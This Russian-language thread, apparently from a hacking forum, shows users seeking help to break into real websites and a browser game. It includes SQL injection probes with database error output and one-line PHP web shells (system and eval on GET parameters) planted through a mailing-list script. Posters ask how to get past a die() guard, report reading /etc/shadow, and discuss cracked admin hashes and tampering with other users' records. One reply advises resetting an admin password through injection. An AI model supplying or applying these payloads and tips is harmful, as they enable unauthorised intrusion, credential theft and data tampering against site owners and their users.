С запросами sql только знакомлюсь и в локалке наткнулся на /games.html?page=phpinfo() Фото: http://s009.radikal.ru/i308/1012/60/eb2a481c242a.jpg Вопрос: Простая ошибка БД или есть возможность sql-inj? Буду рад любым ответам,даже если пошлют в google.
http://www.site.com/default.asp?show=dologin&id=1' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [MySQL][ODBC 3.51 Driver][mysqld-5.1.51-community]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 /incs/menu_inc.asp, line 300 при определине рентабельности полей http://www.site.com/default.asp?show=dologin&id=1+union+select+1,2--+ точно так же как и при http://www.site.com/default.asp?show=dologin&id=1 но при следующих действиях пишет Microsoft VBScript runtime error '800a000d' Type mismatch: 'CInt' /incs/menu_inc.asp, line 303 подскажите что я делаю не так? P.S. PR 7
Пробую лить мелкий шелл через добавления юзера, но при просмотре пхпинфо ничего не выводит. Нагуглил исходники двига, в начале скрипта стоит <?die;?> Можно ли как-нибудь обойти это?
ты сам понял что сказал? "Пробую лить мелкий шелл через добавления юзера" может обясниш каким способом? " но при просмотре пхпинфо ничего не выводит" что должно выводить? "Нагуглил исходники двига, в начале скрипта стоит <?die;?>" какого скрипта?
я долго читал ...мелкий шелл имеешь в виду <? system($_GET[cmd]); ?> ? какой скрипт...короче относишся к категории фейспалма
Не так выразился. Konqi Есть скрипт рассылки wr-subscribe 1.0 Добавляю <?php eval($_GET[c]); ?> в меню Создать рассылку. Вызываю пхпинфо site.ru/allsubscribe.php?c=phpinfo(); - белая страница вылазит. Залил на локалхост скрипт рассылки, убрал в начале скрипта <?die;?> - всё пашет (открывает пхпинфо). Вот и спрашиваю можно ли как-нибудь залить шелл, когда в начале стоит <?die;?>
вот в этом и проблема...читал /etc/shadow, /etc/my.cnf....а конфиги апача или пхп никак не могу найти. Apache 2.2.14 (Ubuntu)
всем привет! на сайте нашол sql-inj, достал логин и хеш, хеш сдесь помогли расшифровать, но в админку не пускает. Как быть? Чё делать?
https://forum.antichat.ru/thread49775.html это новогодняя магия, чем может форум помочь тебя? как варианты это таблица юзеров а не админов это не админка это другая админка это подделка старая таблица админов, со старыми паролями
Привет. Нашел sql инъекцию в одно игре, но справится с ней не могу. Игра не интересная, а вот как выполнить инъекцию стало интересно. Подскажите. Вобщем так. По всей видимости выполняются последовательно два таких вот запроса SELECT field1%%, field2%% from table1 where user=123 limit 1 UPDATE table1 set field1%% = ?, field2%% = 0 where user=123 limit 1 где %% любое значение которое можно передать запросом, оно ни как не фильтруется. Значение подставляется одно и тоже во всех 4х местах ? тут должно быть какое то значение, но его нет, т.е пусто. Видимо значение высчитывается после 1 sql запроса. Или есть еще другие sql заросы. значения в полях field числовые Если будет ошибка в 1м sql запросе, до второго не доходит. Без ошибок работает только когда %% равно от 1 до 5. Но сообщает типа, что у нас там чего то не хватает для выполнения действия (игровой момент). Задача выполнить update для одного пользователя 123 и изменить значения в полях field11 (field12 ...)
да сразу измени пароль админа через иньекцию...зачем хеш админа добывать, потом его расшифровывать...а ведь могут и не сбрутить же..тогда как похекать сайт? Улавливаешь мысль насчет апдейта? хоть подумайте перед тем как всякий бред постить...
мысль не уловил) до апдейта дело не дойдет, если 1й селект вернёт ошибку. а строка инъукции которую я передам втавляется одновременно и в 1 селект и во 2й апдейт. Вот и не получается мне так написать, что бы и селект не ругнулся и апдейт что нибудь нужное проапдейтил. Я хорошо подумал, перед тем как тут этот бред писать Мне не нужен хеш админа, я про него ни слова не сказал) там и хешей то нет наверно. И цель у меня не сайт взломать, чисто спортивный интерес+ очень сомнительная вероятность подзаработать. Это не форум не портал, а простенькая браузерная игра.
